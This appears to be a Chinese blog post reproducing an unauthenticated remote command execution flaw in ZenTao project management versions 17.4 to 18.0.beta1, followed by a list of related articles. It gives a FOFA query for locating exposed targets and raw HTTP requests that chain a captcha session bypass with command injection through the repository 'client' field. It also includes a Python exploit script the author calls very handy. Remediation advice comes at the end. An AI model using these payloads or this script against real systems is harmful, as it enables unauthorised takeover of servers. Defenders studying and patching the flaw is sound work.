禅道研发项⽬管理系统未授权RCE漏洞复现

已于 2023-12-08 17:30:36 修改
阅读量1.3k 收藏 4
点赞数 3
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 禅道
于 2023-11-09 17:25:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56698744/article/details/134306157
版权

1、产品介绍

Zendao禅道是第一款国产的开源项目管理软件,他的核心管理思想基于敏捷方法scrum,内置了产品管理和项目管理,同时又根据国内研发现状补充了测试管理、计划管理、发布管理、文档管理、事务管理等功能。

2、漏洞描述

该系统在2023年1月被爆出命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道项目管理系统权限认证存在缺陷导致,攻击者可利用该漏洞在未授权的情况下,通过权限绕过在服务器执行任意命令。

影响版本

17.4<= version <=18.0.beta1(开源版)

3.4<= version <=4.0.beta1(旗舰版)

7.4<= version <=8.0.beta1(企业版)

3、fofa 查询语句

fofa:title="用户登录 - 禅道"

4、环境搭建

下载地址:禅道18.0.beta1发布,经典模式全新升级!支持创建项目型项目! - 禅道下载 - 禅道开源项目管理软件

安装包再最下面

建议大家选择Linux系统

tips:如果系统已安装了apache和mysql服务,记得关闭,不然会与一键安装包中的服务冲突

解压

tar -zxvf ZenTaoPMS.18.0.beta1.zbox_64.tar.gz

启动服务

/opt/zbox/zbox start

启动 Apache和Mysql服务后,浏览器直接访问 http://ip

输入禅道默认的管理员账号和密码:admin,123456

5、漏洞复现

首先,用burp抓包,携带有效cookie创建代码仓库

第一段poc

GET /misc-captcha-user.html HTTP/1.1
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: text/html;charset=UTF-8
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
Host: xxx.xxx.xxx.xxx
Connection: close

第二段poc 

POST /repo-create.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
Accept-Language: zh-CN,zh;q=0.9
X-Requested-With: XMLHttpRequest
Referer: http://xxx.xxx.xxx/repo-edit-1-0.html
Host: xxx.xxx.xx.xx
Content-Length: 111
Expect: 100-continue
Connection: close

product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=

 tips:我这里这个图是有问题的 

发送如下请求,如果存在漏洞,则返回包中会包含命令执行的结果,如执行‘id’命令

POST /repo-edit-10000-10000.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
Accept-Language: zh-CN,zh;q=0.9
X-Requested-With: XMLHttpRequest
Referer: http://xxxx.xxxx.xxxx/repo-edit-1-0.html
Host: xxxx.xxxx.xxxx
Content-Length: 26
Expect: 100-continue
Connection: close

SCM=Subversion&client=`id`

6、EXP

最后不知道哪位大佬的exp,特别好用!!!

# -*- coding: UTF-8 -*-
# !/usr/bin/python
 
'''
权限绕过+RCE POC 伪静态传参版
禅道系统 影响版本 安全版本
开源版 17.4以下的未知版本<=version<=18.0.beta1 18.0.beta2
旗舰版 3.4以下的未知版本<=version<=4.0.beta1 4.0.beta2
企业版 7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2
'''
import requests
 
proxies = {
    #"http": "127.0.0.1:8080",
    #"https": "127.0.0.1:8080",
}
def check(url):
    url1 = url+'/misc-captcha-user.html'
    # url1 = url+'/index.php?m=misc&f=captcha&sessionVar=user'#非伪静态版本按照此格式传参
    # url2 = url+'/index.php?m=block&f=printBlock&id=1&module=my'#可判断验证绕过的链接
    url3 = url + 'repo-create.html'
    url4 = url + 'repo-edit-10000-10000.html'
    headers={
        "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language":"zh-CN,zh;q=0.9",
        "Cookie":"zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
    }
 
    headers2 = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
        "Content-Type":"application/x-www-form-urlencoded",
        "X-Requested-With":"XMLHttpRequest",
        "Referer":url+"/repo-edit-1-0.html"
    }
 
    data1 = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
    data2 = 'SCM=Subversion&client=`id`'
    s=requests.session()
    try:
        req1 = s.get(url1,proxies=proxies,timeout=5,verify=False,headers=headers)
        req3 = s.post(url3,data=data1,proxies=proxies,timeout=5,verify=False,headers=headers2)
        req4 = s.post(url4,data=data2,proxies=proxies,timeout=5,verify=False,headers=headers2)
        if 'uid=' in req4.text:
            print(url,"")
            return True
    except Exception as e:
        print(e)
    return False
if __name__ == '__main__':
    print(check("http://x.x.x.x/zentao/"))

6、修复建议

1、升级版本

目前禅道官方已正式发布修复版本,建议受影响用户尽快升级至安全版本。

2、临时措施

如不能升级,可在module/common/model.php文件中的echo $endResponseException->getContent();后面加上exit(); 来修复权限绕过漏洞。

故事讲予风听
关注
专栏目录
禅道管理系统RCE漏洞复现+利用
0xSec
02-01 2万+
2023年1月6日,互联网披露其旧版本中存在权限绕过与命令执行漏洞,攻击者可在无需登录的情况下构造恶意请求执行任意命令,控制服务器。
漏洞复现禅道管理系统-授权-api
知黑而守白
05-31 154
禅道管理系统(以下简称禅道系统)是一个开源的目管理软件,专门设计用于敏捷开发,提供了需求管理、任务管理、缺陷跟踪、测试管理和目绩效等功能,帮助团队更高效地进行目规划和执行。影响范围v16.x
禅道身份认证绕过漏洞(QVD-2024-15263)复现
06-19
QVD-2024-15263 测试脚本
禅道管理系统存在远程命令执行漏洞RCE
nnn2188185的博客
04-14 3688
禅道是第一款国产的开源目管理软件,也是国内最流行的目管理软件。该系统在2023年初被爆出在野命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道管理系统权限认证存在缺陷导致,攻击者可利用该漏洞授权的情况下,通过权限绕过在服务器执行任意命令。
禅道管理系统身份认证绕过漏洞
huangyongkang666的博客
04-27 1837
禅道目管理软件是国产的开源目管理软件,专注研发目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,完整覆盖了研发目管理的核心流程。禅道管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器16.x
漏洞复现禅道——授权登入(QVD-2024-15263)
LongL_GuYu的博客
07-06 1712
禅道(Zentao)是一款开源的目管理和协作软件。禅道管理系统中的存在QVD-2024-15263身份认证绕过漏洞。攻击者可利用该漏洞创建任意账号实现授权登录。
禅道管理系统 身份验证漏洞分析QVD-2024-15263
shelter1234567的博客
05-03 1586
最近不怎么更新了!向小伙伴说明下 我不是什么组织 更不什么经销号(尽管csdn有很多经销广告号)一确实是下岗了!忙着为找工作而发愁。简历都投出去如同石沉大海能不愁吗!.哎......二是忙着论文及材料的事....三是也看了最近的漏洞,感觉也没啥可分析的 一眼就看出问题所在。有什么可分析的呢!就像医生看看患者如同看萝卜白菜一样.....,那分析反序列化链呢,这也没什么意思啊!话说到此,今儿个就推荐你看这篇文章。有一定难度挑战度,内容还是跟以前一样,以一个挖洞者的视角来讲解分析。
禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记
weixin_30781567的博客
05-17 926
禅道全版本rce漏洞复现笔记漏洞说明禅道目管理软件是一款国产的,基于LGPL协议,开源免费的目管理软件,它集产品管理、目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的,因此禅道几乎所...
Nacos 2.2.0反序列化漏洞禅道18.0.0.1内网渗透
最新发布
qq_63322621的博客
10-27 770
利用Nacos 2.2.0反序列化漏洞:Nacos是一个广泛使用的配置管理和服务发现工具。在2.2.0版本中,存在反序列化漏洞,构造恶意的序列化数据包,通过Nacos的反序列化机制触发漏洞,可以被利用来执行恶意代码。成功利用漏洞后,可以在目标系统上执行任意命令。禅道RCE漏洞禅道是一款目管理软件,其18.0.1版本中存在远程代码执行漏洞。通过该漏洞,攻击者可以向目标系统发送特制请求,执行任意代码。学习链接:下载Nacos安装包​​Windows安装java8教程。
2021HW行动漏洞披露和漏洞修复分析.zip
06-30
2021/04/08 用友NC6.5 用友NC反序列化 用友 NC 反序列化RCE漏洞 2021/04/08 dubbo 存在反序列化命令执行漏洞,POC疑似已流出 2021/04/08 Weblogic 某weblogic的T3反序列化0day分析 Weblogic T3 反序列化远程代码执行...
2021 HW 漏洞清单汇总 ( 附 poc )
热门推荐
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道目管理软件11.6禅道 11.6 sql注...
禅道管理系统身份认证绕过漏洞复现(QVD-2024-15263)
0xSec
04-28 1914
2024年4月,互联网披露禅道系统存在身份认证绕过的漏洞情报。经分析,确认该漏洞利用简单,并可能在绕过权限后利用后台其他漏洞实现远程代码执行,建议受影响的客户尽快修复漏洞
pymssql中执行sql sever为什么会乱码_禅道免登陆SQL注入漏洞复现
weixin_39645249的博客
12-12 173
一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1,禅道目管理软件集产品管理、目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的目管理软件,完美地覆盖了目管理的核心流程。漏洞出现在系统orm框架中,在拼接order by的语句过程的时候,对limit部分过滤并直接拼接,导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下,攻击者可利用该漏洞获取w...
禅道linux一键安装漏洞,禅道远程代码执行漏洞复现分析
weixin_42190030的博客
05-17 821
1.前言2019年9月,禅道目管理软件爆出全版本的RCE漏洞。于是便好奇漏洞的成因,在阅读作者的文章及自己复现分析后,发现漏洞其实算是一种越权调用,普通权限(用户组为1-10)的攻击者可通过module/api/control.php中getModel方法,越权调用module目录下所有的model模块和方法,从而实现SQL注入、任意文件读取、远程代码执行等攻击。2.漏洞分析在分析漏...
禅道 11.6版本 后台漏洞 复现和审计
weixin_45427650的博客
04-04 3176
文章目录查看版本漏洞sql注入任意文件读取rce 禅道 11.6版本下载地址 本次复现环境windows 先搞清楚禅道参数的传递方式,进入index.php慢慢看 先发现了这个语句: 这个导致禅道的查看版本信息的漏洞 跟进看一下 查看版本漏洞 复现payload:http://ip/zentao/index.php?mode=getconfig 跟进exportConfig() 文件位置:zentao\framework\router.class.php 调用父类的exportConfig()
Linux安装禅道11.6并进行漏洞复现
per_se_veran_ce的博客
08-27 2156
一、安装禅道 1、下载禅道11.6 wget https://www.zentao.net/dl/zentao/11.6/ZenTaoPMS.11.6.stable.zbox_64.tar.gz` 2、解压到opt目录下 sudo tar -zxvf ZenTaoPMS.11.6.stable.zbox_64.tar.gz -C /opt 3、开启Apache和Mysql /opt/zbox/zbox start 4、浏览器访问禅道登录页面 http://127.0.0.1/ 查看版本信息
禅道系统权限绕过与命令执行漏洞分析
C20220511的博客
03-09 2031
权限绕过的关键点在module/common/model.php文件中checkPriv函数,此函数是检查权限的函数,验证当前登陆用户是否有访问module与method的权限。经过代码审计发现captcha函数可以直接写入一个自定义key的session,此段代码本意是设置生成一个自定义session的key的验证码,开发者应该是想写一个公共的验证码生成函数让其他开发者做新功能需要的时候可以直接调用,正好可以利用生成一个key为user的session。后面加上exit();来修复权限绕过漏洞
Goby漏洞更新 禅道研发管理系统命令注入漏洞
2401_84247760的博客
04-12 445
人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

故事讲予风听

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值